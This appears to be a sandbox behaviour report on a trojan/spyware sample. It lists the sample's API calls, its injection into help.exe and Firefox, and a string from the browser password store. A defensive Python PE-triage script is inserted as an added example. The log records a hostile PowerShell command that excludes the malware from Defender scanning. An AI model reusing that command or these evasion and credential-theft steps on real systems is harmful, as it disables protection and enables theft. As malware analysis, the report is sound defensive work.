                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2DD0 NtDelayExecution,3_2_019B2DD0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2D10 NtMapViewOfSection,3_2_019B2D10
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2D00 NtSetInformationFile,3_2_019B2D00
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2D30 NtUnmapViewOfSection,3_2_019B2D30
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2CA0 NtQueryInformationToken,3_2_019B2CA0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2CC0 NtQueryVirtualMemory,3_2_019B2CC0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2CF0 NtOpenProcess,3_2_019B2CF0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2C00 NtQueryInformationProcess,3_2_019B2C00
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2C60 NtCreateKey,3_2_019B2C60
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2F90 NtProtectVirtualMemory,3_2_019B2F90
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2FB0 NtResumeThread,3_2_019B2FB0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2FA0 NtQuerySection,3_2_019B2FA0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2FE0 NtCreateFile,3_2_019B2FE0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2F30 NtCreateSection,3_2_019B2F30
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2F60 NtCreateProcessEx,3_2_019B2F60
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2E80 NtReadVirtualMemory,3_2_019B2E80
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2EA0 NtAdjustPrivilegesToken,3_2_019B2EA0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2EE0 NtQueueApcThread,3_2_019B2EE0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2E30 NtWriteVirtualMemory,3_2_019B2E30
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B3090 NtSetValueKey,3_2_019B3090
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B3010 NtOpenDirectoryObject,3_2_019B3010
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B39B0 NtGetContextThread,3_2_019B39B0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B3D10 NtOpenProcessToken,3_2_019B3D10
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B3D70 NtOpenThread,3_2_019B3D70
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE4340 NtSetContextThread,LdrInitializeThunk,6_2_02CE4340
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE4650 NtSuspendThread,LdrInitializeThunk,6_2_02CE4650
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2AD0 NtReadFile,LdrInitializeThunk,6_2_02CE2AD0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2AF0 NtWriteFile,LdrInitializeThunk,6_2_02CE2AF0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_02CE2BE0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_02CE2BF0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_02CE2BA0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2B60 NtClose,LdrInitializeThunk,6_2_02CE2B60
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_02CE2EE0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_02CE2E80
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2FE0 NtCreateFile,LdrInitializeThunk,6_2_02CE2FE0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2FB0 NtResumeThread,LdrInitializeThunk,6_2_02CE2FB0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2F30 NtCreateSection,LdrInitializeThunk,6_2_02CE2F30
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_02CE2CA0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2C60 NtCreateKey,LdrInitializeThunk,6_2_02CE2C60
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_02CE2C70
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2DD0 NtDelayExecution,LdrInitializeThunk,6_2_02CE2DD0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_02CE2DF0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_02CE2D10
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_02CE2D30
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE35C0 NtCreateMutant,LdrInitializeThunk,6_2_02CE35C0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE39B0 NtGetContextThread,LdrInitializeThunk,6_2_02CE39B0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2AB0 NtWaitForSingleObject,6_2_02CE2AB0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2B80 NtQueryInformationFile,6_2_02CE2B80
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2EA0 NtAdjustPrivilegesToken,6_2_02CE2EA0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2E30 NtWriteVirtualMemory,6_2_02CE2E30
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2F90 NtProtectVirtualMemory,6_2_02CE2F90
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2FA0 NtQuerySection,6_2_02CE2FA0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2F60 NtCreateProcessEx,6_2_02CE2F60
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2CC0 NtQueryVirtualMemory,6_2_02CE2CC0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2CF0 NtOpenProcess,6_2_02CE2CF0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2C00 NtQueryInformationProcess,6_2_02CE2C00
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2DB0 NtEnumerateKey,6_2_02CE2DB0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2D00 NtSetInformationFile,6_2_02CE2D00
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE3090 NtSetValueKey,6_2_02CE3090
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE3010 NtOpenDirectoryObject,6_2_02CE3010
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE3D70 NtOpenThread,6_2_02CE3D70
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE3D10 NtOpenProcessToken,6_2_02CE3D10
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_00628E40 NtCreateFile,6_2_00628E40
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_00628FA0 NtReadFile,6_2_00628FA0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_00629090 NtDeleteFile,6_2_00629090
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_00629130 NtClose,6_2_00629130
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_00629290 NtAllocateVirtualMemory,6_2_00629290
                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 0_2_008D3E400_2_008D3E40
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 0_2_008D6F920_2_008D6F92
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 0_2_008DD87C0_2_008DD87C
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 0_2_04AB87240_2_04AB8724
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Code functions (process 0): 0_2_04AB02A0, 0_2_04AB0290, 0_2_04ABBC48, 0_2_06FB2640, 0_2_06FBCFB0, 0_2_06FB2632, 0_2_06FBCA00, 0_2_06FBC9F0
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Code functions (process 3): 3_2_00418723, 3_2_004028F0, 3_2_0040E109, 3_2_0040E113, 3_2_00416923, 3_2_00410133, 3_2_0040E258, 3_2_0040E263, 3_2_00403270, 3_2_00401230, 3_2_0040E2AC, 3_2_0042EC13, 3_2_00402530, 3_2_004045A7, 3_2_00404624, 3_2_0040FF0A, 3_2_0040FF13, 3_2_01A341A2, 3_2_01A401AA, 3_2_01A381CC, 3_2_01970100, 3_2_01A1A118, 3_2_01A08158, 3_2_01A12000, 3_2_01A403E6, 3_2_0198E3F0, 3_2_01A3A352, 3_2_01A002C0, 3_2_01A20274, 3_2_01A40591, 3_2_01980535, 3_2_01A2E4F6, 3_2_01A24420, 3_2_01A32446, 3_2_0197C7C0, 3_2_019A4750, 3_2_01980770, 3_2_0199C6E0, 3_2_01A4A9A6, 3_2_019829A0, 3_2_01996962, 3_2_019668B8, 3_2_019AE8F0, 3_2_0198A840, 3_2_01982840, 3_2_01A36BD7, 3_2_01A3AB40, 3_2_0197EA80, 3_2_01998DBF, 3_2_0197ADE0, 3_2_0198AD00, 3_2_01A1CD1F, 3_2_01A20CB5, 3_2_01970CF2, 3_2_01980C00, 3_2_019FEFA0, 3_2_01972FC8, 3_2_0198CFE0, 3_2_01A22F30, 3_2_019A0F30, 3_2_019C2F28, 3_2_019F4F40, 3_2_01992E90, 3_2_01A3CE93, 3_2_01A3EEDB, 3_2_01A3EE26, 3_2_01980E59, 3_2_0198B1B0, 3_2_01A4B16B, 3_2_0196F172, 3_2_019B516C, 3_2_01A3F0E0, 3_2_01A370E9, 3_2_019870C0, 3_2_01A2F0CC, 3_2_019C739A, 3_2_01A3132D, 3_2_0196D34C, 3_2_019852A0, 3_2_01A212ED, 3_2_0199B2C0, 3_2_01A1D5B0, 3_2_01A495C3, 3_2_01A37571, 3_2_01A3F43F, 3_2_01971460, 3_2_01A3F7B0, 3_2_01A316CC, 3_2_019C5630, 3_2_01A15910, 3_2_01989950, 3_2_0199B950, 3_2_019838E0, 3_2_019ED800, 3_2_0199FB80, 3_2_019BDBF9, 3_2_019F5BF0, 3_2_01A3FB76, 3_2_01A21AA3, 3_2_01A1DAAC, 3_2_019C5AA0, 3_2_01A2DAC6, 3_2_01A37A46, 3_2_01A3FA49, 3_2_019F3A6C, 3_2_0199FDC0, 3_2_01A37D73, 3_2_01983D40, 3_2_01A31D5A, 3_2_01A3FCF2, 3_2_019F9C32, 3_2_01981F92, 3_2_01A3FFB1, 3_2_01943FD5, 3_2_01943FD2, 3_2_01A3FF09, 3_2_01989EB0
Source: C:\Windows\SysWOW64\help.exe Code functions (process 6): 6_2_02D302C0, 6_2_02D50274, 6_2_02D703E6, 6_2_02CBE3F0, 6_2_02D6A352, 6_2_02D42000, 6_2_02D681CC, 6_2_02D641A2, 6_2_02D701AA, 6_2_02D38158, 6_2_02CA0100, 6_2_02D4A118, 6_2_02CCC6E0, 6_2_02CAC7C0, 6_2_02CD4750, 6_2_02CB0770, 6_2_02D5E4F6, 6_2_02D62446, 6_2_02D54420, 6_2_02D70591, 6_2_02CB0535, 6_2_02CAEA80, 6_2_02D66BD7, 6_2_02D6AB40, 6_2_02CDE8F0, 6_2_02C968B8, 6_2_02CBA840, 6_2_02CB2840, 6_2_02CB29A0, 6_2_02D7A9A6, 6_2_02CC6962, 6_2_02D6EEDB, 6_2_02D6CE93, 6_2_02CC2E90, 6_2_02CB0E59, 6_2_02D6EE26, 6_2_02CA2FC8, 6_2_02CBCFE0, 6_2_02D2EFA0, 6_2_02D24F40, 6_2_02D52F30, 6_2_02CF2F28, 6_2_02CD0F30, 6_2_02CA0CF2, 6_2_02D50CB5, 6_2_02CB0C00, 6_2_02CAADE0, 6_2_02CC8DBF, 6_2_02CBAD00, 6_2_02D4CD1F, 6_2_02CCB2C0, 6_2_02D512ED, 6_2_02CB52A0, 6_2_02CF739A, 6_2_02C9D34C, 6_2_02D6132D, 6_2_02CB70C0, 6_2_02D5F0CC, 6_2_02D6F0E0, 6_2_02D670E9, 6_2_02CBB1B0, 6_2_02CE516C, 6_2_02C9F172, 6_2_02D7B16B, 6_2_02D616CC, 6_2_02CF5630, 6_2_02D6F7B0, 6_2_02CA1460, 6_2_02D6F43F, 6_2_02D795C3, 6_2_02D4D5B0, 6_2_02D67571, 6_2_02D5DAC6, 6_2_02CF5AA0, 6_2_02D51AA3, 6_2_02D4DAAC, 6_2_02D67A46, 6_2_02D6FA49, 6_2_02D23A6C, 6_2_02D25BF0, 6_2_02CEDBF9, 6_2_02CCFB80, 6_2_02D6FB76, 6_2_02CB38E0, 6_2_02D1D800, 6_2_02CB9950, 6_2_02CCB950, 6_2_02D45910, 6_2_02CB9EB0, 6_2_02C73FD5, 6_2_02C73FD2, 6_2_02CB1F92, 6_2_02D6FFB1, 6_2_02D6FF09, 6_2_02D6FCF2, 6_2_02D29C32, 6_2_02CCFDC0, 6_2_02CB3D40, 6_2_02D61D5A, 6_2_02D67D73, 6_2_00611B90, 6_2_0060CA20, 6_2_0060CA17, 6_2_0060CC40, 6_2_0060AC20, 6_2_0060AC16, 6_2_0060AD65, 6_2_0060AD70, 6_2_0060ADB9, 6_2_006010B4, 6_2_00601131, 6_2_00615230, 6_2_00613430, 6_2_0062B720, 6_2_03085264, 6_2_0307E2F7, 6_2_0307E1D8, 6_2_0307D758, 6_2_0307E68D, 6_2_0307C963, 6_2_0307C9F8
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Code function: String function: 019C7E54 appears 111 times
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Code function: String function: 019FF290 appears 105 times
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Code function: String function: 019EEA12 appears 86 times
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Code function: String function: 0196B970 appears 280 times
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Code function: String function: 019B5130 appears 58 times
Source: C:\Windows\SysWOW64\help.exe Code function: String function: 02CF7E54 appears 111 times
Source: C:\Windows\SysWOW64\help.exe Code function: String function: 02D1EA12 appears 86 times
Source: C:\Windows\SysWOW64\help.exe Code function: String function: 02D2F290 appears 105 times
Source: C:\Windows\SysWOW64\help.exe Code function: String function: 02CE5130 appears 58 times
Source: C:\Windows\SysWOW64\help.exe Code function: String function: 02C9B970 appears 280 times
Source: mKv3sKQ5Q4E7waF.exe Binary or memory string: OriginalFilename vs mKv3sKQ5Q4E7waF.exe
Source: mKv3sKQ5Q4E7waF.exe, 00000000.00000002.845792819.000000000073E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs mKv3sKQ5Q4E7waF.exe
Source: mKv3sKQ5Q4E7waF.exe, 00000000.00000002.847115595.00000000026B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTL.dll" vs mKv3sKQ5Q4E7waF.exe
Source: mKv3sKQ5Q4E7waF.exe, 00000000.00000002.864590116.0000000006DC0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs mKv3sKQ5Q4E7waF.exe
Source: mKv3sKQ5Q4E7waF.exe, 00000000.00000002.866107737.0000000008302000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs mKv3sKQ5Q4E7waF.exe
Source: mKv3sKQ5Q4E7waF.exe, 00000000.00000002.866107737.0000000008302000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename] vs mKv3sKQ5Q4E7waF.exe
Source: mKv3sKQ5Q4E7waF.exe, 00000000.00000002.868241767.00000000084F0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTL.dll" vs mKv3sKQ5Q4E7waF.exe
Source: mKv3sKQ5Q4E7waF.exe, 00000000.00000002.847115595.000000000261C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTL.dll" vs mKv3sKQ5Q4E7waF.exe
Source: mKv3sKQ5Q4E7waF.exe, 00000000.00000000.833808576.00000000001B2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamezpaD.exe> vs mKv3sKQ5Q4E7waF.exe
Source: mKv3sKQ5Q4E7waF.exe, 00000003.00000002.993274250.0000000001A6D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs mKv3sKQ5Q4E7waF.exe
Source: mKv3sKQ5Q4E7waF.exe, 00000003.00000002.990846497.0000000001337000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameHelp.Exej% vs mKv3sKQ5Q4E7waF.exe
Source: mKv3sKQ5Q4E7waF.exe, 00000003.00000002.990846497.0000000001347000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameHelp.Exej% vs mKv3sKQ5Q4E7waF.exe
Source: mKv3sKQ5Q4E7waF.exe Binary or memory string: OriginalFilenamezpaD.exe> vs mKv3sKQ5Q4E7waF.exe
Source: mKv3sKQ5Q4E7waF.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: mKv3sKQ5Q4E7waF.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
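The two static-PE lines above and the earlier "OriginalFilename ... vs mKv3sKQ5Q4E7waF.exe" comparisons are what a first-pass triage script reproduces from the file header, the section table and the version resource. The Python below is an added example and is not part of the Joe Sandbox report or its tooling: it parses the COFF file header and section table with the standard library, finds any UTF-16 OriginalFilename value by byte pattern (so it also works on a memory dump), and flags what a reviewer wants called out: writable-and-executable sections, code sections with no raw data, a link timestamp in the future, and an OriginalFilename that does not match the on-disk name. The PE bytes it runs on are constructed inline with the flags and the zpaD.exe OriginalFilename this report lists; they are not the analysed sample, and the second, packed-looking header and the "now" epoch are assumptions for the demonstration.

```python
import re
import struct
from datetime import datetime, timezone

# Bit names from winnt.h for the two header fields the report quotes.
FILE_CHARACTERISTICS = {0x0002: "EXECUTABLE_IMAGE", 0x0020: "LARGE_ADDRESS_AWARE",
                        0x0100: "32BIT_MACHINE", 0x2000: "DLL"}
SECTION_CHARACTERISTICS = {0x00000020: "IMAGE_SCN_CNT_CODE",
                           0x00000040: "IMAGE_SCN_CNT_INITIALIZED_DATA",
                           0x20000000: "IMAGE_SCN_MEM_EXECUTE",
                           0x40000000: "IMAGE_SCN_MEM_READ",
                           0x80000000: "IMAGE_SCN_MEM_WRITE"}
MACHINES = {0x014C: "i386", 0x8664: "AMD64"}

# VS_VERSIONINFO stores the key "OriginalFilename" in UTF-16LE, a NUL, optional
# 4-byte alignment padding, then the UTF-16LE value. A byte pattern finds it in a
# file or a memory dump without walking the resource tree.
ORIGINAL_FILENAME_RE = re.compile(
    "OriginalFilename".encode("utf-16-le")
    + rb"\x00\x00(?:\x00\x00)*((?:[\x20-\x7e]\x00){1,64})")


def _flags(value, table):
    return [name for bit, name in table.items() if value & bit]


def parse_pe(data: bytes) -> dict:
    """Parse the COFF file header and section table of a PE32/PE32+ image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    fh = e_lfanew + 4
    machine, nsect, tstamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, fh)
    sections = []
    off = fh + 20 + opt_size  # section table follows the optional header
    for _ in range(nsect):
        name, vsize, vaddr, rsize, rptr, _, _, _, _, schars = struct.unpack_from(
            "<8sIIIIIIHHI", data, off)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": vsize, "virtual_address": vaddr,
                         "raw_size": rsize, "raw_pointer": rptr,
                         "flags": _flags(schars, SECTION_CHARACTERISTICS)})
        off += 40
    return {"machine": MACHINES.get(machine, hex(machine)),
            "timestamp": tstamp,
            "timestamp_utc": datetime.fromtimestamp(tstamp, tz=timezone.utc).isoformat(),
            "characteristics": _flags(chars, FILE_CHARACTERISTICS),
            "sections": sections,
            "original_filenames": [m.group(1).decode("utf-16-le")
                                   for m in ORIGINAL_FILENAME_RE.finditer(data)]}


def triage(info: dict, on_disk_name: str, now=None) -> list:
    """Static findings worth a second look; 'now' is a Unix epoch for the timestamp check."""
    findings = []
    if "EXECUTABLE_IMAGE" not in info["characteristics"]:
        findings.append("file header lacks EXECUTABLE_IMAGE")
    for s in info["sections"]:
        if "IMAGE_SCN_MEM_WRITE" in s["flags"] and "IMAGE_SCN_MEM_EXECUTE" in s["flags"]:
            findings.append(f"section {s['name']} is writable and executable")
        if "IMAGE_SCN_CNT_CODE" in s["flags"] and s["raw_size"] == 0 and s["virtual_size"] > 0:
            findings.append(f"code section {s['name']} has no raw data (filled at runtime?)")
    if now is not None and info["timestamp"] > now:
        findings.append(f"link timestamp {info['timestamp_utc']} is in the future")
    for orig in info["original_filenames"]:
        if orig.lower() != on_disk_name.lower():
            findings.append(f"OriginalFilename {orig} vs on-disk name {on_disk_name}")
    return findings


def build_sample_pe(sections, timestamp, original_filename=None, characteristics=0x0102):
    """Constructed PE32 header for the demonstration; this is not the analysed sample."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    opt_size = 0xE0                                                 # PE32 optional header size
    file_header = struct.pack("<HHIIIHH", 0x014C, len(sections), timestamp, 0, 0,
                              opt_size, characteristics)
    optional = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)    # Magic = PE32, rest zero
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), vsize, 0x1000, rsize,
                    0x400, 0, 0, 0, 0, flags)
        for name, flags, vsize, rsize in sections)
    tail = b""
    if original_filename:   # key, NUL terminator, 2 bytes of padding, value, NUL
        tail = (b"\0" * 16 + "OriginalFilename".encode("utf-16-le") + b"\0\0\0\0"
                + original_filename.encode("utf-16-le") + b"\0\0")
    return dos + b"PE\0\0" + file_header + optional + table + tail


# Constructed input carrying the flags and OriginalFilename this report lists.
SAMPLE = build_sample_pe(
    [(".text", 0x60000020, 0x3000, 0x3000), (".rsrc", 0x40000040, 0x600, 0x600)],
    timestamp=1700000000, original_filename="zpaD.exe")
# Constructed packed-looking header: W+X code section with no raw data, timestamp in 2100.
PACKED = build_sample_pe([(".text", 0xE0000020, 0x5000, 0)], timestamp=4102444800)
```

Run parse_pe on open(path, "rb").read() for a real file; the OriginalFilename scan is a byte-pattern search, not a full VS_VERSIONINFO walk, which is why it also picks the value up from the process memory dumps the "vs" lines above were taken from.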
Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, FolyCtNo8kLdxjDknn.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, FolyCtNo8kLdxjDknn.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, jYZmvtAx2Fnacyn2Tb.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, jYZmvtAx2Fnacyn2Tb.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, jYZmvtAx2Fnacyn2Tb.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@12/12@18/14
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\mKv3sKQ5Q4E7waF.exe.log
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6940:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sw0f32q0.yuk.ps1
Source: mKv3sKQ5Q4E7waF.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: help.exe, 00000006.00000002.3289014379.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000006.00000002.3289014379.0000000000716000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000006.00000003.1177101920.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000006.00000003.1176989330.00000000006C7000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000006.00000003.1184416266.00000000006F4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string (schema of the Chromium "Login Data" SQLite database, i.e. the browser's saved-password store): CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: mKv3sKQ5Q4E7waF.exe ReversingLabs: Detection: 25%
Source: unknown Process created: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe"
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Process created: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe Process created: C:\Windows\SysWOW64\help.exe "C:\Windows\SysWOW64\help.exe"
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
